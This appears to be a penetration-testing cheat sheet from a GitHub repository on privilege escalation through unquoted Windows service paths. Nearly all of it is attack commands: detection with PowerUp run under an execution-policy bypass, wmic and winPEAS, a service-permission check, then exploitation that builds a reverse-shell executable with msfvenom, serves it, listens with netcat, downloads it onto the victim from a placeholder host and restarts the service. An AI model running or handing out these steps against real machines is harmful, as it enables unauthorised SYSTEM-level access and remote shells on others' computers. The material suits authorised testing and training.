-
Notifications
You must be signed in to change notification settings - Fork 7
/
unquoted_service_paths
22 lines (19 loc) · 1.56 KB
/
unquoted_service_paths
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
---
tags: [ exploit, wpe, windows, privesc ]
---
# Unquoted service paths
# Detection
powershell -exec bypass -command "& { Import-Module .\PowerUp.ps1; Invoke-AllChecks; }"
wmic service get name,pathname | findstr /i /v "C:\Windows\\" | findstr /i /v """
winPEAS.exe
# Validation
$serviceName = "YourServiceName"; $accessRules = (Get-Service -Name $serviceName).ServiceHandle | Get-Acl | % { $_.GetAccessRules($true, $true, [System.Security.Principal.NTAccount]) }; $canStart = $accessRules | ? { $_.FileSystemRights -band 4 -and $_.IdentityReference.Translate([System.Security.Principal.SecurityIdentifier]).Value -eq [System.Security.Principal.WindowsIdentity]::GetCurrent().User.Value }; $canStop = $accessRules | ? { $_.FileSystemRights -band 2 -and $_.IdentityReference.Translate([System.Security.Principal.SecurityIdentifier]).Value -eq [System.Security.Principal.WindowsIdentity]::GetCurrent().User.Value }; if ($canStart -and $canStop) { "You have permission to start and stop the service: $serviceName" } elseif ($canStart) { "You have permission to start the service: $serviceName" } elseif ($canStop) { "You have permission to stop the service: $serviceName" } else { "You do not have permission to start or stop the service: $serviceName" }
# Exploitation
# Attacker
msfvenom -p windows/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > Common.exe
sudo python -m SimpleHTTPServer 80
sudo nc -lvp <PORT>
# Victim
cd "C:\Program Files\Unquoted Path Service\"
powershell.exe (New-Object System.Net.WebClient).DownloadFile('http://<IP>/Common.exe', '.\Common.exe')
sc start unquotedsvc